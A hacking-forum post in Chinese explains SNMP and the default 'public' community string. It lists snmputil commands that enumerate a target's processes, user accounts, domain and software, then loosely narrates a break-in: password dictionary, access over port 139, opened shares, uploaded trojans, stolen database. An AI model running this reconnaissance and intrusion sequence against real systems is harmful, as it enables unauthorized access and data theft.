Ghost网安小组-Ghostgroup

 找回密码
 立即注册
搜索
热搜: 渗透
查看: 27|回复: 0

snmp

[复制链接]
发表于 2019-11-13 11:24:41 | 显示全部楼层 |阅读模式
漏洞 snmp (161/udp) Snmp口令

Snmp口令: "public"  

很多朋友不清楚.我在这里为大家讲解下..........

SNMP的前身是简单网关监控协议(SGMP),用来对通信线路进行管理。随后,人们对SGMP进行了很大的修改,特别是加入了符合Internet定义的SMI和MIB:体系结构,改进后的协议就是著名的SNMP。SNMP的目标是管理互联网Internet上众多厂家生产的软硬件平台,因此SNMP受Internet标准网络管理框架的影响也很大。现在SNMP已经出到第三个版本的协议,其功能较以前已经大大地加强和改进了。

SNMP的体系结构是围绕着以下四个概念和目标进行设计的:保持管理代理(agent)的软件成本尽可能低;最大限度地保持远程管理的功能,以便充分利用Internet的网络资源;体系结构必须有扩充的余地;保持SNMP的独立性,不依赖于具体的计算机、网关和网络传输协议。在最近的改进中,又加入了保证SNMP体系本身安全性的目标。

另外,SNMP中提供了四类管理操作:get操作用来提取特定的网络管理信息;get-next操作通过遍历活动来提供强大的管理信息提取能力;set操作用来对管理信息进行控制(修改、设置);trap操作用来报告重要的事件。
从上面的介绍可以看出,snmp其实是可以得到对方许多主机资料的.............知道了上面的信息后,我在给大家介绍snmp入侵用到的一个工具
snmputil.exe

在DOS下运行的格式为..........
snmputil walk 对方ip public .1.3.6.1.2.1.25.4.2.1.2 列出系统进程

snmputil walk 对方ip public .1.3.6.1.4.1.77.1.2.25.1.1 列系统用户列表

snmputil get 对方ip public .1.3.6.1.4.1.77.1.4.1.0 列出域名

snmputil walk 对方ip public .1.3.6.1.2.1.25.6.3.1.2 列出安装的软件

snmputil walk 对方ip public .1.3.6.1.2.1.1 列出系统信息

首先通过snmputil walk 对方ip public .1.3.6.1.4.1.77.1.2.25.1.1
得到了对方的用户名...........
接着自己做了字典...呵呵.........结果嘛........他的密码其实超简单.........
至此,顺利通过139进行了端口溢出.......也就是通过NT-Server

呵呵,接着就是一些常用的命令啦........
首先连接它.........接着做开启共享,上传木马啊.........
其实最重要的还是拿到数据库..............
                                    
给大家写这篇文章就是让大家不要忽略161这个端口,有时一个很小的漏洞,都会换来致命的崩溃.

We Are Ghost
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ| Ghost网安小组-Ghostgroup |网站地图

GMT+8, 2020-2-22 20:15

Powered by Aatrox

© 2001-2020 We Are Ghost

快速回复 返回顶部 返回列表